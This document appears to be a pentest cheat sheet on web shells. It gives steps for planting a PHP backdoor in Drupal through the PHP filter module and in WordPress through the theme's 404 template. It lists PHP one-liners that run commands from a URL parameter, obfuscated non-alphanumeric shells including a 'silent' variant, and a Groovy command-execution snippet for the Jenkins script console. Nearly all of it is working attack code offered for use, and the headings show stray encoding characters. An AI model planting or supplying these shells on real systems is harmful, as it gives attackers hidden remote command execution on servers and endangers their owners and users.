WebShell
Webshellsâ
ls /usr/share/webshells/
Drupalâ
1. Add "php filter" module
2. Add a basic page in content tab with a PHP webshell
3. Choose Text format PHP code
Wordpressâ
1. Appearance => Editor
2. 404 Template + select the right theme
3. Copy the content of simple-backdoor.php
4. Update the file
PHPâ
Regularâ
<?php system("whoami"); ?>
<?php echo `whoami`; ?>
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>
<?php echo shell_exec("whoami");?>
<?php exec("ls -la",$array); print_r($array); ?>
<?php system($_GET['cmd']); ?>
<?php passthru($_GET['cmd']); ?>
Non-alphanum charsâ
Equivalent to ${_GET}[_](${_GET})[__];
Usage: http://host/websh.php?_=system&__=id
Silent version ('@')
<?=~$_='$<>/'^'{{{{';@${$_}[_](@${$_}[__]);
Debug version
<?=$_='$<>/'^'{{{{';${$_}[_](${$_}[__]);
Jenkins / Groovyâ
info
Don't put more than one command.
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"